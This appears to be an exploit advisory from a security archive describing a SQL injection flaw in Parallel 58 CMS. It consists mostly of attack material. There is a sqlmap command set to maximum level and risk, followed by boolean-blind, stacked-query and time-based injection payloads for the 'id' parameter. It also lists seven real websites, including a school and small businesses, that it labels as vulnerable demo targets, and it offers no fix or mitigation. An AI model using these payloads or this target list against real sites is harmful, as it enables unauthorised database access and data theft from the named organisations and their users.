Parallel 58 CMS – SQL Injection vulnerability

2020.08.14
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#Exploit Title: Parallel 58 CMS – SQL Injection vulnerability #Date: 2020-08-14 #Exploit Author: Mostafa Farzaneh #Vendor Homepage: www.para58.co.uk #Google Dork: N/A #Category: webapps #Tested On: windows 10, Firefox, kali Linux #Software Link: www.para58.co.uk/portfolio.php #Proof of Concept: run sqlmap sqlmap -u " target " --level=5 –-risk=3 --dbs --random-agent #Example payload: Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=3107202009301462893' AND 8979=8979 AND 'xTLr'='xTLr Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: id=3107202009301462893';SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=3107202009301462893' AND (SELECT 2998 FROM (SELECT(SLEEP(5)))ffzs) AND 'ZKMz'='ZKMz ############################################################################### Demo: https://www.thursohighschool.org.uk/news_item.php?id=1308202015275024504[Sql Injection vulnerability] Demo: https://www.cashpoint45.com/jewellery2.php?category=19[Sql Injection vulnerability] Demo: https://www.armadalefarm.co.uk/news_item.php?uid=1008202005580821381[Sql Injection vulnerability] Demo: http://www.wandageddes.co.uk/product_view.php?ind=119[Sql Injection vulnerability] Demo: http://www.applecatcherfilms.com/gallery_view.php?uid=1701201805062231043[Sql Injection vulnerability] Demo: http://www.kindalehouse.co.uk/availability.php?uid=1503201810062991481[Sql Injection vulnerability] Demo: https://www.kwk9.org/dogs_view.php?uid=2007202015462453802[Sql Injection vulnerability] ********************************************************* #Discovered by: Mostafa Farzaneh from PywebSecurity team #Telegram: @pyweb_security *********************************************************


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top